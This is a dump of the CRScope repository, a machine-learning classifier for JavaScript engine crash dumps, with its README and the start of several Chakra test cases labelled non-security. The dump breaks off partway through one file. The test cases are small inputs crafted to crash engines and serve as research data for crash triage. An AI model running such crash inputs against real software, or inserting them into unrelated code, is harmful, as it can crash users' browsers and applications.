├── CRScope.py ├── README.md ├── data ├── all.csv ├── chakra.csv ├── spider_monkey.csv └── v8.csv ├── js_tests ├── Chakra │ ├── non-security │ │ ├── 0cdec7b4734f80af025fba121342c3e2.js │ │ ├── 122151bd72e5753ab20a2ded98583706.js │ │ ├── 14ecc9972609cc3e973c0340a8de3e02.js │ │ ├── 1823be3fb97575fc3a93b555b02d43a6.js │ │ ├── 1f40aeb7417f35d6e85474b151855766.js │ │ ├── 26fc9ce38e362ce1518f9b1c904a04da.js │ │ ├── 27049c7deb2b98be7bf6d1936513a99e.js │ │ ├── 29cd24aac963d3157c053b084e7365e0.js │ │ ├── 30429918bb56fc097b8c45968e9802f2.js │ │ ├── 3936ea54550b6b2150dc2d78cc404898.js │ │ ├── 3d76e2fd373184f149cf93dc5d5d8c22.js │ │ ├── 3ece64addaf36aa7fb9fed4895c28347.js │ │ ├── 4362ee7695f659f60da9701ef04e5bef.js │ │ ├── 46c4ef978f00499085df43e7146e52c1.js │ │ ├── 4ca9f1c12566bc4a1c675b4e058027f8.js │ │ ├── 4f23439477546269364ed0a25eb5e5c3.js │ │ ├── 566a6f42e4df817adb930d5010bd5ed0.js │ │ ├── 5a780646c248cca2ae260120835132c7.js │ │ ├── 677c7106a430132148dc483fac5a0b06.js │ │ ├── 6edfa75ccf20fa9d33f076396248e106.js │ │ ├── 73ecced13c9732ab92114dfdb8825c89.js │ │ ├── 7bc84ae4eda042d373b7f997302480b9.js │ │ ├── 82e82d53acb33c17d1755312689cc663.js │ │ ├── 84333d579a39730166faa6ce3b64b830.js │ │ ├── 84db5a947b8ef7b74afd7f1fee8eb550.js │ │ ├── 9c66602e79773ee7de25104e699c6581.js │ │ ├── a47a62eab398c21869cc73cad4eccb62.js │ │ ├── a64df42a15c2777963b8e0d008ad5326.js │ │ ├── ad2700833a5c053340b578050d9731dd.js │ │ ├── b24d653b3efaddb9e36b87813527d384.js │ │ ├── b3cdbb4ef086d74b24ba058e9102901d.js │ │ ├── bff71298ab7ceb4865b02fda1b217747.js │ │ ├── d3150ff7d8b5cede4098dc40cb42f81e.js │ │ ├── e680755792aa4abdf9a439d9983d84dd.js │ │ └── f08d971f88dadd007a7c3d7b92a63377.js │ └── security │ │ ├── 032e67cac67406c7bc627f049739ed7a.js │ │ ├── 0438dcc5717dcfba590a58146e8342df.js │ │ ├── 0594329cb631d0f451efaf77951cfc1e.js │ │ ├── 084b113898b1d0efe80ad4267136b6e6.js │ │ ├── 11bcbe29c6c12f5d68efd4ef047616f6.js │ │ ├── 11c5d58e62c843b667191f6cc191251f.js │ │ ├── 138652a6f59a3f3fe07c07e60f872234.js │ │ ├── 151858cbef318192f02ff18bf5450e82.js │ │ ├── 1b9b16589db8a4144bf33be24da1026f.js │ │ ├── 1d82c72a52b7ae891c640a809cde6ec1.js │ │ ├── 202082cdb0d72ba16b289ba0277d7ddd.js │ │ ├── 2d094ed06a413ead55365500b3647adf.js │ │ ├── 2d26bd586d0ba2e37e0695b567f7a06f.js │ │ ├── 30b0d4e25c6cc3f8d5ca83fd58ff3630.js │ │ ├── 31efc1d474de2597d5c61096c7aefbf7.js │ │ ├── 438cd0259c3c3eaaeada10d45a57bebf.js │ │ ├── 4439a653039d36f21d826d4e154d0351.js │ │ ├── 45597a60240bd4655b555856f15bb0f0.js │ │ ├── 4c48f6365c277bc0748af530b189a910.js │ │ ├── 4df093e402080c42ee7df1f00239dcc7.js │ │ ├── 502e25e7a29c7e0f161a52266eabd27c.js │ │ ├── 571b316543613a61af63b7d3ca2a113e.js │ │ ├── 5a8254f91a8a517300231382d9e1336c.js │ │ ├── 638b1113d6ab2833782e1351a93e34f1.js │ │ ├── 656e1b9e4f95190fba4ffcfac9e93ec7.js │ │ ├── 65e7a56f9d05e99f4d2b4343992d9f8b.js │ │ ├── 679309dceef3d2f2187f1111f4075b4c.js │ │ ├── 685836ad34a740613868a23358d0827c.js │ │ ├── 6c3265b8555f5efa042d716f0880070a.js │ │ ├── 6f573a162ac0a9ac7487690f9bbdd246.js │ │ ├── 70a6a1d18869f227db158450031fb994.js │ │ ├── 72edfd4a7c465d252587b4713edda6ff.js │ │ ├── 77cf3ade75703485020325e9e78019d2.js │ │ ├── 7acd3aaa7688052307c7773e40d2ad24.js │ │ ├── 7e8cb06a56988edea77b8126fcd3816c.js │ │ ├── 8066d2712fe2975004b5d32404012b9a.js │ │ ├── 89d68098fa7eae1f1ea36bbcfa8ced96.js │ │ ├── 8b0396470fd7f59d31e7bef1a629df5e.js │ │ ├── 8d5bb94c163d4f3ba4cf62066fa85b27.js │ │ ├── 906d168d7a129503b55f57eca3a25aa5.js │ │ ├── 91d46d54f82febfe84a24f6001a68d43.js │ │ ├── 9759a1cf463948911b7ea6467cfe39b8.js │ │ ├── 985f48051362afc734104de86dc2ad30.js │ │ ├── 9ac27263931b67f5b312cb0ea1e5f111.js │ │ ├── a561aef2104a059f827616b3c380ec01.js │ │ ├── a66ca98f4dd3b4406e402828f693d572.js │ │ ├── a7f12d3bca479ac7b9e29e2235cf1828.js │ │ ├── a9d195d1a9721dd849c6a0541c4f2f90.js │ │ ├── aaf333c29f4a1442131a594f9f204a42.js │ │ ├── b5225c1dddbb6c2a0113fa418280e4ab.js │ │ ├── b67a85cc8c0acb333181aff1e12faec7.js │ │ ├── bc41cfc331cf7eecc4b0c996a73d4269.js │ │ ├── beaf6c54560546a72f1e56e2815b1622.js │ │ ├── c6a9be9876a9b2673b5ee6a17202e6d8.js │ │ ├── ca5987191d5b895070a79c5a1aaf2470.js │ │ ├── cbd84e3e234e22ef7b0094199b3cb981.js │ │ ├── d95c5363ab3fc946aa8a04373e201ff5.js │ │ ├── dd7d0cfc151f57112b3240a1949e5398.js │ │ ├── e01b1b82903ad11b2854068c7492ef7c.js │ │ ├── e1be402ec4171d5189b7818c653696a3.js │ │ ├── e3564896b49307c9a441d0d49c9f8605.js │ │ ├── e6384df98b3404c2189ac3dde0fc1c2c.js │ │ ├── e6f31fb4256ca9a24e864dedd5a62cac.js │ │ ├── ec1035e67ad58dfb3f2ba95948f1e835.js │ │ ├── ed903469a4c2669eb1988d8d169b4979.js │ │ ├── f580a47df2636db8b775af39e5946ad9.js │ │ ├── f58a108fc5ad573a720ba57e8d909cda.js │ │ ├── fa0c5c5e8092767fea631464ab7f8c65.js │ │ └── ff2b0316d75e3ea3b5d4d9d610409bfa.js ├── SpiderMonkey │ ├── non-security │ │ ├── 010f477e412079d01f4788d353626c80.js │ │ ├── 0188d787b6c6861b3de9c3fea4afc018.js │ │ ├── 03754208ba0caa659f6d8e6e62ecf9bb.js │ │ ├── 038c795b68595d0612efa6dc8f505f03.js │ │ ├── 093f3bad6a07bc3288dce7ab28d1cd65.js │ │ ├── 0945eac4569d1e87dcb7cb72c769fb48.js │ │ ├── 0bfa96b1338e54a3e12ccbabf04f39b7.js │ │ ├── 0cd667adde8726784e0bd3c215552757.js │ │ ├── 0ed82065d8fcb8f0d46d040d41f4e1ac.js │ │ ├── 14c31db39203a4a6a3ea147723c9304c.js │ │ ├── 185776b5975e22285914c19a72cc466a.js │ │ ├── 1943f20370550cf2cc534c12df4bf243.js │ │ ├── 23daaf120528d50be656133ae536ef3c.js │ │ ├── 29e612e3531c8d8fb14ef378e7e9041f.js │ │ ├── 2ef177f6ccd0b714ac76a0d75ef70f63.js │ │ ├── 34634184bee8d9f71be27450baf1717e.js │ │ ├── 37b7ea2826aa3b81ddc9540a350b7af1.js │ │ ├── 387eb5422fd74824e4daeb043cf37bae.js │ │ ├── 397a188b727909733912c8eed664d6c5.js │ │ ├── 3c181e661cc116572e8b05bbbb22decf.js │ │ ├── 3c801c3fc0d6a3475796749caa5f80a9.js │ │ ├── 3cc7ef212af0c53a795add2d7ea603a5.js │ │ ├── 4020c54f061b22f5f78317480c8298ae.js │ │ ├── 413cf350542ab889f19ac5427514da57.js │ │ ├── 41df61053734d07032a4e6f443e65408.js │ │ ├── 454e1d9ba5ee230e34f9d3e546abbbb0.js │ │ ├── 47a595b0f3da72ef136e5c22f2a4ba78.js │ │ ├── 47a98ed63c8e444320edc50ba846e3c7.js │ │ ├── 48a9bdf1fa79a6e0e2b00934f3ef5f8d.js │ │ ├── 48b186c99e3bd510a08e9945d773719d.js │ │ ├── 49f1a3cda162e2a3b7e5980275684e02.js │ │ ├── 4abf5e18f5044a68b694c370d0eac0cd.js │ │ ├── 4b27b9a03525a954911d57635e79a78a.js │ │ ├── 4b8c361292b81aed875211a1d42025d6.js │ │ ├── 4ccee4930248e16fbca5a4a1c3f2ecc8.js │ │ ├── 4f40a8975593d73a3d551c9bff7beb32.js │ │ ├── 53515406cdca19199992c42b347c163c.js │ │ ├── 5397fbecb8f6f1b35614f67e163406fe.js │ │ ├── 543eb522a3bdad0650ed6c2eb76de1c1.js │ │ ├── 58e41fb7d9c7487d61e45962c8e0c1ee.js │ │ ├── 5c9356279cd3d4ff17b0b178339dbb6f.js │ │ ├── 6934c9ed5cf8de5ddf97e38cde1e7986.js │ │ ├── 6b346621415579ad3d469fb40a927993.js │ │ ├── 6be281da01a445179d9052562e6b550c.js │ │ ├── 6c072232542a68dca4a56a4602dbc686.js │ │ ├── 6ec218b2bd88ee1f4d56c9bf62289f01.js │ │ ├── 6fa21680e88c64b2a16bafd6555e674a.js │ │ ├── 6fb9b2a9398add2905d69cb5c01d4a54.js │ │ ├── 70ae37ec4d612495d36742f72ff893f9.js │ │ ├── 73d68f3ed37e27854cc93e72c3525cf1.js │ │ ├── 756478befa3c198e175d6d9024ad8c49.js │ │ ├── 7ff2f22584cbcf9bacef207a363dcb8d.js │ │ ├── 80f41ae8f713dba701d963b1baafdda7.js │ │ ├── 810d408bdcec45dfe4bda2c4ab64320f.js │ │ ├── 84b11ee01ec92543f4011353e650bacc.js │ │ ├── 8c8488b5d79804f2fccc433e9d3cc3ec.js │ │ ├── 952e1b2eafcb597e31f8a2de2d734c12.js │ │ ├── 963b25ca02b044015f61e1c4c6db0916.js │ │ ├── 9b7fc6a45db19397c12a57887377a600.js │ │ ├── aa39434f87686585d5eb4824c51ef8f7.js │ │ ├── aa394e92a49e1396edbb12a861d962c9.js │ │ ├── ab237933a8288bbad572cc71d1ea90aa.js │ │ ├── ac14bbef904fdc3f384d71a1c657b56d.js │ │ ├── ae7697e0cd939a469f0674fb224a9b60.js │ │ ├── af8d7a74b9c267111a1633122adf5b43.js │ │ ├── b06a3ef5822daf6e010e750f00daa5f0.js │ │ ├── b10c59e1e5b5d9dbc95ec0a433ce63cf.js │ │ ├── b1dd9acf148be510ff9b67367a7d6873.js │ │ ├── b366bdebc96b1cb053c3bc049666000a.js │ │ ├── b545df65432c21338e122a5ca62e6727.js │ │ ├── b5ad63aa3d2817e43cff9be02c4b815c.js │ │ ├── b759c3b04bd7268d45053eb0a754a41e.js │ │ ├── b997dd70239c5f60fc26146b8a6f057e.js │ │ ├── b9ea5b5212e2e36d2d0a6afe46a3bb2f.js │ │ ├── bc491314668e02e6061a5d23c6ef9ecd.js │ │ ├── bd5b8c5045f72aa3a958bed412150793.js │ │ ├── c3411abd52e80a4852c47eff6f88e151.js │ │ ├── cce45cb9fbd0a50fbb9454371eaeff5b.js │ │ ├── cf5a9bd4ab3f43817e5f879c65968627.js │ │ ├── d01bb9eac933876ff295ca823cbc4448.js │ │ ├── d03ec466f441b5e88536f67ee1d7589b.js │ │ ├── d0d679a3657f7dd9623eb5bd482ad093.js │ │ ├── d5eac0c5bb2fc7e835052071c8f464f1.js │ │ ├── db372fc4453e42c53da4aa89e08f2c58.js │ │ ├── df82bb4b6b094c6840c2e145538c2147.js │ │ ├── e5a3f760014e026d3d553ee1d7a5eae4.js │ │ ├── e8dba4cc3d207b9733d091a52099d943.js │ │ ├── ea2f3ad34565e4ddfac0abe35b2f70f7.js │ │ ├── ebaa88fd5e22024b4d7c4f74d5ec4c80.js │ │ ├── ed362efcc02a46b54820cf70c7124579.js │ │ ├── f1f31f7e62f0ae0d7602e8939bd15a39.js │ │ ├── f214bfab1815347651036b8650d5c10e.js │ │ ├── f558c9579eea68dcd5a74c6c1b18c07b.js │ │ ├── f843c3b8dac85b5a5116128cdfeface4.js │ │ ├── f9d411bbf22e136381144687ae174fab.js │ │ ├── fd3614cc773a1e38fcf7d4b5e1436d59.js │ │ ├── fe7c10a79991c4b089324459ac1c083c.js │ │ └── ff908a12e38b85e2867ed9d26abbe4da.js │ └── security │ │ ├── 05d7ff5164675ae926f87c88b45b78e7.js │ │ ├── 0da7571c7da906b8eea7bf08da38deb6.js │ │ ├── 171403d46f39cf2c40d54dc82dd1e8c2.js │ │ ├── 1ca241661670296fdb22be5140d1cd64.js │ │ ├── 2f968ffed92c8da111409670f4859ae8.js │ │ ├── 3d156fe0f93604acae02bad218bf1ff6.js │ │ ├── 45303d3d8ed370a5636b9b7ab41408df.js │ │ ├── 4a4d91260491f4db1bc718e8a342492e.js │ │ ├── 534f1144546e9ad46e23ebb53f62299e.js │ │ ├── 5a5d00d88b7e0d77a622949b957669ab.js │ │ ├── 5edade3aa37def405d23661c5110c61d.js │ │ ├── 5efa5f2166101feb36794f032712da25.js │ │ ├── 6c01f7461a53d0235071d08e2af7311d.js │ │ ├── 6c2d86aba516a9578bb2b96e3a76e621.js │ │ ├── 731966186e0e6cf13863edda470d5ac3.js │ │ ├── 7602e5a90086002eaafbf6ecf36cc208.js │ │ ├── 76e0533b28841587e27e40d1e982d1bd.js │ │ ├── 7a491bee53e50f9f3b372a9a1bbcff9d.js │ │ ├── 7dee43a951e123cf3743cd8f67dcfaa8.js │ │ ├── 857ffa6b37c97e060ed2bfd0c4d20b66.js │ │ ├── 89a95ef2cab38c4cbce7e58cb291c9d5.js │ │ ├── 8ebd8e30c53d646638000da1ed745294.js │ │ ├── 952ecce60cecc66103301ceae02695d8.js │ │ ├── 986ea973c6cd10e3419b69e081ae801f.js │ │ ├── 9f56a24c393c62b942bdd66b9aa75a21.js │ │ ├── a15686d5f5c042728a31a1c9eab76e28.js │ │ ├── a3fd00ef0d42ee50afe4cde0b69ac00e.js │ │ ├── ab945d25510d1ae600a8e7319af9568b.js │ │ ├── b1032cd1239cb2866406c21d27086e9b.js │ │ ├── bdb494099f2ebaf790db3eeb962e4bf1.js │ │ ├── c35ea168b468e447a397fa69719dd4d3.js │ │ ├── cda6288cf9ced00b390da463ff25886f.js │ │ ├── d338ac6c2b3254c3ebf387230fb2396b.js │ │ ├── d42ce677cdb354a90625a4abd1d34741.js │ │ ├── d6c9b1100a507466ea01b3e57fa364bf.js │ │ ├── da56c8ffa1728b41e3e69f45baccfc5a.js │ │ ├── dcc0b4d4894e1e58a58a94629727ea99.js │ │ ├── df53d00a2726563b16eea12fc7d2e683.js │ │ ├── e3605f03fcecccb85bf8995ccf3afe7d.js │ │ ├── e86441456ad36d4d139496d8dda9cf25.js │ │ ├── e95e5239e1f2f206518430bca12589ef.js │ │ ├── e9d7b74546c8883347f456ce848ec0ee.js │ │ ├── eb5c1e4020c86d95be2dd1f35ca70dcc.js │ │ ├── ebe297ba96d5b1c84a59c2379979b514.js │ │ ├── eca12c4af8898ad6543b7c9fad2148eb.js │ │ └── fbdd8176b157b85d779a3e1f14991e64.js └── V8 │ ├── non-security │ ├── 0e6c7c74434af21977eb556962d793b5.js │ ├── 13499669cc36cb4f8bcddeaa8cff0202.js │ ├── 13cb49ec84640fb1ad7db2d46ef2fdb4.js │ ├── 15411e7b82229573f3ab22bfc84a42a4.js │ ├── 1d50f04a91a926664e3f0cf9dfafccc7.js │ ├── 1f1e59baccd8c16fb3935c6c357d26de.js │ ├── 1fe3a69891b40a8d6a2cac2cb6c4058b.js │ ├── 23bad2ab14166793d7f11ba88764e2d6.js │ ├── 2a2d66706551744505fab1d33875a512.js │ ├── 2be1a68565c62898d3cae21f31dacd14.js │ ├── 2db0f3303ab19e02a05cf0f6aafd4cd4.js │ ├── 336dd61b23e272e4bfc9d1e6efab503a.js │ ├── 4a62f02e1903453be714ab56f9ea439a.js │ ├── 4cbfd82314fec2fef5f16578baa6e510.js │ ├── 5227874330c0483ba14fd6879cd83924.js │ ├── 59e3edfeb6c86858259666cc083ff68a.js │ ├── 6e1265cffb0bec85b77f4752a292e2e8.js │ ├── 7f26245f11f2272455878c0b8d08bad5.js │ ├── 83f06b51233bbbf8be5f3b26124beb23.js │ ├── 8a82d6a740d34f2d01e44a2729dcc75c.js │ ├── 8bd9587c93ec24348ebfe706100a917c.js │ ├── 8d1d4d96a8a81c7fcc581619de5c259f.js │ ├── 98670f07471ba0d4bd3d8a0a8b369de7.js │ ├── a17b685d5f84eaf0493c831aa68104c7.js │ ├── a5901f10f6a8bc3e8477f762293da01a.js │ ├── b39caa805623f92949977131877b711f.js │ ├── b8f3fc60d4acc46a2e5f8bfa9608a3d7.js │ ├── be50310cae90a2e6a096c92c12b4e27e.js │ ├── c08a6606a0401615a9f6c054a517dafa.js │ ├── c0b1729c6e3d03688066fb6fd82d301e.js │ ├── c390ab15b6f2424d9e27a6d6f8e65f6f.js │ ├── cf4784fbf5952207fe4add954c7cf7cc.js │ ├── d168a1e007a7088781edf09fa13064c3.js │ ├── e2fdedf89261d27bff0f7731ef14effc.js │ ├── e92099553e545ea290caba8769a860f7.js │ ├── ec65741fafce1061aeec78faa654a279.js │ ├── ee62aff7f0bab8b73c8e0328715ac650.js │ ├── f295639a4f672a0cb731342b8df7489a.js │ ├── f3ee1fc87ff3bf21a40def6745f58456.js │ ├── f7eb6e8b2e0fa096c5b2c706bbff54d0.js │ └── fce75d0d22db8df67e69ce1488220265.js │ └── security │ ├── 138d46c9c100091485cae53d924d79e7.js │ ├── 1e2dca4a2b537b6b06ca72a2c1ed06f9.js │ ├── 21d60617d98913e374f3558e9d406869.js │ ├── 2395eade5efe87e1f11785282f84a355.js │ ├── 23efb40dcf732313d800016b2829d262.js │ ├── 277a11e956ef6e311937bb160453ba8f.js │ ├── 2b5602c8168df9651bcd0c4f10aef68b.js │ ├── 3e5bdc6fe48a04f7e2a2e8101245a1f5.js │ ├── 412812e4deeeb6b473a64d50655ec6c3.js │ ├── 4959f5a9d9c93a0726a01455642808a6.js │ ├── 4d895e00a3333cc5b64f294ea7e28d6e.js │ ├── 529a774f4310f0b70b39326ca6aee51e.js │ ├── 569973c25a1e09d5e497efebfa2c60fa.js │ ├── 5a41732c2dc26305861bbcded53f456b.js │ ├── 5af8cf9a35e1c8660f597d2705f1fb98.js │ ├── 5f994376eaca6bb3aee94496bc7f3a27.js │ ├── 68c51a20da2893d592c867ea7d96f835.js │ ├── 6fcd9b74a2f4f9c57664a959b219af73.js │ ├── 707798104262791113ec67d3ce412716.js │ ├── 73b99da7d97778c6f33164122eb8ce27.js │ ├── 78e52b2219332d10bb59b13ed96d0435.js │ ├── 7f57fecdab869371571069819f85ef95.js │ ├── 8616cc6d366a11e2cef989fd98989f9c.js │ ├── 8bc1faa8ef2df14c6ed20a0390912667.js │ ├── 8d76376c6eda7e4b79b422956259a1de.js │ ├── 8df92afc56bf07655198403ad5cc9025.js │ ├── 8f19f80de422a34f72c284d9abd2a4bd.js │ ├── 9c66ed7afc9e82d2f41a5e7c0c9add59.js │ ├── 9fad2ed6552f56c5a1828879d043c657.js │ ├── a098aed0dd6fdee300164c76c0dd085f.js │ ├── a4e07de3081d24933070cec32e06f754.js │ ├── ac45c4f18c69251de154d104a91ece11.js │ ├── b482f07acac8211350984ed2df1375aa.js │ ├── b6ce03dea55d10cb4a2d31d801e44da2.js │ ├── c6b9618f73f0ce26d6d8d3f8cbc04afa.js │ ├── c9b010c6898bea44a775f2fddb064cef.js │ ├── c9fa07f8f7e631a35fc1985fbaeed40c.js │ ├── cc35c6bdb4a8d5d5b704735c3556d2f4.js │ ├── d05d03c2b19ed1acd27ba8b004092542.js │ ├── d1ecfec41f5238812d24c2516949a515.js │ ├── d26333736f9b167881c163a9134a99d4.js │ ├── e122c759ac220fe3f887c4565b8a578f.js │ ├── e1896d3d27323954b6d893c876117f13.js │ ├── e3a1bc101eb25a1d57e039ccdff0fc17.js │ ├── e3cef65942c177b74841132cd20f0b76.js │ ├── e82fc45e9057c89ce8d67ca38a7e4227.js │ ├── eb0fada39a4d0ce7e30b22b94884b993.js │ ├── eeab1d87a61ef30ea60b168773762d2c.js │ ├── f28112595043066a56f8de4cf1c6d125.js │ └── f60803ceaaf37ad832856d0c05036085.js ├── paper.pdf └── src ├── arg.py ├── case.py ├── data.py ├── docs.py ├── log.py ├── model ├── __init__.py ├── decision_tree_classifier.py ├── linear_svc.py ├── logistic_regression.py ├── mlp_classifier.py ├── model.py ├── multinomial_nb.py └── random_forest_classifier.py └── util.py /README.md: -------------------------------------------------------------------------------- 1 | # CRScope 2 | 3 | CRash Scope (CRScope) is a ML-guided crash classifier of a given JavaScript engine crash-dump file. 4 | 5 | 6 | ## Installation 7 | 1. Install dependencies 8 | ``` 9 | sudo apt update 10 | sudo apt install python-pip python-dev 11 | 12 | sudo pip install pandas==0.23.0 13 | sudo pip install scipy==1.0.0 14 | sudo pip install scikit-learn==0.20.3 15 | sudo pip install imbalanced-learn==0.3.3 16 | sudo pip install matplotlib==2.1.0 17 | sudo pip install python-docx==0.8.6 18 | sudo pip install XlsxWriter==1.0.2 19 | sudo pip install joblib==0.11 20 | ``` 21 | 22 | 2. Clone `CRScope` 23 | ``` 24 | git clone https://github.com/WSP-LAB/CRScope.git 25 | cd CRScope 26 | ``` 27 | 28 | ## Usage 29 | 1. Prepare the csv file that contains feature information of each crash instance. 30 | - We provide sample csv files in `./data` directory. 31 | 32 | 2. Run CRScope 33 | ``` 34 | usage: CRScope.py [-h] 35 | [-e {chakra,v8,spider,chakra_v8,chakra_spider,v8_spider,all}] 36 | [-s {under,over}] [-o OPTION] [-c {crscope,exniffer,combi}] 37 | [-v VERSION] 38 | datafile 39 | ``` 40 | - `-s`, `-o`: Sampling method for balancing security and non-security data 41 | - `-s over`: Oversampling 42 | - `-o 1`: RandomOverSampler 43 | - `-o 2`: ADASYN 44 | - `-o 3`: SMOTE 45 | - `-s under`: Undersampling 46 | - `-o 1`: RandomUnderSampler 47 | - `-o 2`: TomekLinks 48 | - `-o 3`: CondensedNearestNeighbour 49 | - `-o 4`: OneSidedSelection 50 | - `-o 5`: EditedNearestNeighbours 51 | - `-o 6`: NeighbourhoodCleaningRule 52 | - reference: https://imbalanced-learn.readthedocs.io/en/stable/user_guide.html 53 | - `-c`: The choice for using which type of feature 54 | - `crscope`: CRScope 55 | - `exniffer`: Exniffer 56 | - `combi`: CRScope + Exniffer 57 | - `-e`, `-v`: For naming result directory and files 58 | - `-e`: A directory with the selected engine name will be created 59 | - `-v`: Result files with the version name will be created 60 | 61 | - For example, 62 | ``` 63 | $ ./CRScope.py -e chakra -s over -o 1 -c crscope -v chakra_crscope_v1 ./data/chakra.csv 64 | ``` 65 | 66 | 3. The final reports will be saved in `result` directory. 67 | 68 | More details can be found in the [paper](./paper.pdf). 69 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/122151bd72e5753ab20a2ded98583706.js: -------------------------------------------------------------------------------- 1 | function o(){}async function af0(a){await 0;return await arguments/**/}async function a(){0()}af0();function f(){}function Run(){}WScript.Attach(Run);WScript 2 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/14ecc9972609cc3e973c0340a8de3e02.js: -------------------------------------------------------------------------------- 1 | class ExternInt16Array extends Int16Array { 2 | static get [Symbol.species]() { return Map;}; 3 | }; 4 | 5 | var m1 = new Map(); 6 | var o1 = Object.getPrototypeOf(m1); 7 | Reflect.defineProperty(Map.prototype, "set", o1); 8 | var o2 = new ExternInt16Array(new ArrayBuffer(0x1000)); 9 | var m2 = new Map(o2); 10 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/1823be3fb97575fc3a93b555b02d43a6.js: -------------------------------------------------------------------------------- 1 | class A{ 2 | constructor() { 3 | } 4 | } 5 | 6 | class B extends A { 7 | constructor() { 8 | super(); 9 | } 10 | } 11 | 12 | var observer = new Proxy(A, {}); 13 | Reflect.construct(B, [], observer); 14 | 15 | 16 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/1f40aeb7417f35d6e85474b151855766.js: -------------------------------------------------------------------------------- 1 | var it = function*() { 2 | try { 3 | throw [void 0]; 4 | } catch ([c = (yield c)]) { 5 | } 6 | }(); 7 | 8 | it.next(); 9 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/26fc9ce38e362ce1518f9b1c904a04da.js: -------------------------------------------------------------------------------- 1 | function foo() { 2 | var x = "bp A"; 3 | x; 4 | x = "Hit loc B"; 5 | x; 6 | x = "bp C, BUG"; 7 | x; 8 | x = "bp D, BUG"; 9 | x; 10 | x = "bp D"; 11 | x; 12 | } 13 | WScript.Attach(foo); 14 | WScript.Detach(foo); 15 | WScript.Attach(foo); 16 | WScript.Echo("pass"); 17 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/27049c7deb2b98be7bf6d1936513a99e.js: -------------------------------------------------------------------------------- 1 | var {proxy, revoke} = Proxy.revocable(() => {}, { 2 | get apply() { 3 | revoke(); 4 | } 5 | }); 6 | 7 | proxy(); 8 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/29cd24aac963d3157c053b084e7365e0.js: -------------------------------------------------------------------------------- 1 | WScript.LoadScriptFile("4953_2.js"); 2 | let foo; 3 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/30429918bb56fc097b8c45968e9802f2.js: -------------------------------------------------------------------------------- 1 | var o = {0:1,1:1}; 2 | JSON.parse('[0,0]', function () { 3 | this[1] = o; 4 | }) 5 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/3936ea54550b6b2150dc2d78cc404898.js: -------------------------------------------------------------------------------- 1 | WScript.LoadScriptFile("/data2/sunnyeo/data-set/no-security/ChakraCore/crash/3306_mod0.js", "module"); 2 | WScript.LoadScriptFile("/data2/sunnyeo/data-set/no-security/ChakraCore/crash/3306_script0.js"); 3 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/3d76e2fd373184f149cf93dc5d5d8c22.js: -------------------------------------------------------------------------------- 1 | //load("./wasm-constants.js"); 2 | //load("./wasm-module-builder.js"); 3 | 4 | 5 | (function() { 6 | "use asm"; 7 | var builder = new WasmModuleBuilder(); 8 | builder.addFunction("regression_702460", kSig_i_v) 9 | .addBody([ 10 | kExprI32Const, 0x52, 11 | kExprI32Const, 0x41, 12 | kExprI32Const, 0x3c, 13 | kExprI32Const, 0xdc, 0x01, 14 | kExprGrowMemory, 0x00, 15 | kExprGrowMemory, 0x00, 16 | kExprGrowMemory, 0x00, 17 | kExprSetLocal, 0x00, 18 | kExprGrowMemory, 0x00, 19 | kExprGrowMemory, 0x00, 20 | kExprGrowMemory, 0x00, 21 | kExprGrowMemory, 0x00, 22 | kExprGrowMemory, 0x00, 23 | kExprGrowMemory, 0x00, 24 | kExprGrowMemory, 0x00, 25 | kExprGrowMemory, 0x00, 26 | kExprGrowMemory, 0x00, 27 | kExprGrowMemory, 0x00, 28 | kExprGrowMemory, 0x00, 29 | kExprGrowMemory, 0x00, 30 | kExprGrowMemory, 0x00, 31 | kExprGrowMemory, 0x00, 32 | kExprGrowMemory, 0x00, 33 | kExprGrowMemory, 0x00, 34 | kExprGrowMemory, 0x00, 35 | kExprGrowMemory, 0x00, 36 | kExprGrowMemory, 0x00, 37 | kExprGrowMemory, 0x00, 38 | kExprGrowMemory, 0x00, 39 | kExprS128LoadMem, 0x00, 0x40, 40 | kExprUnreachable, 41 | kExprGrowMemory, 0x00 42 | ]).exportFunc(); 43 | assertThrows(() => builder.instantiate()); 44 | })(); 45 | 46 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/3ece64addaf36aa7fb9fed4895c28347.js: -------------------------------------------------------------------------------- 1 | "friedrichstra\xDFe 14".toUpperCase(0xa >>> 0.0, "Sticky = true, RegExp.match() result"); 2 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/4362ee7695f659f60da9701ef04e5bef.js: -------------------------------------------------------------------------------- 1 | eval("--par=>"); 2 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/46c4ef978f00499085df43e7146e52c1.js: -------------------------------------------------------------------------------- 1 | WScript.LoadModule(` 2 | function AsmModule() { 3 | "use asm" 4 | function x(v) { 5 | v = v | 0; 6 | return v | 0; 7 | } 8 | return x; 9 | }`) 10 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/4ca9f1c12566bc4a1c675b4e058027f8.js: -------------------------------------------------------------------------------- 1 | var arrowInsideWithEval; 2 | 3 | with ({}) { 4 | arrowInsideWithEval = (s) => eval(s); 5 | arrowInsideWithEval("this"); 6 | } 7 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/4f23439477546269364ed0a25eb5e5c3.js: -------------------------------------------------------------------------------- 1 | //test.js 2 | WScript.LoadScriptFile("/data2/sunnyeo/data-set/no-security/ChakraCore/crash/4575_0.js","module"); 3 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/566a6f42e4df817adb930d5010bd5ed0.js: -------------------------------------------------------------------------------- 1 | var a1 = Array.prototype.constructor.apply(null, new Proxy([1950, 1960, 1970, 1980, 1990, 2000, 2010], {})); 2 | var a2 = new Proxy(new Proxy(new Array(66), {}), {}); 3 | var o2 = String.prototype.blink.bind(Object, a1); 4 | Object.setPrototypeOf(a2, o2); 5 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/5a780646c248cca2ae260120835132c7.js: -------------------------------------------------------------------------------- 1 | function a(arg1, arg2) { 2 | this[arg1] = arg2; 3 | } 4 | const b = new Proxy(a, { 5 | construct: function (x, y, z) { 6 | return {}; 7 | } 8 | }); 9 | const boundObject = {}; 10 | const c = b.bind(boundObject, "prop-name"); 11 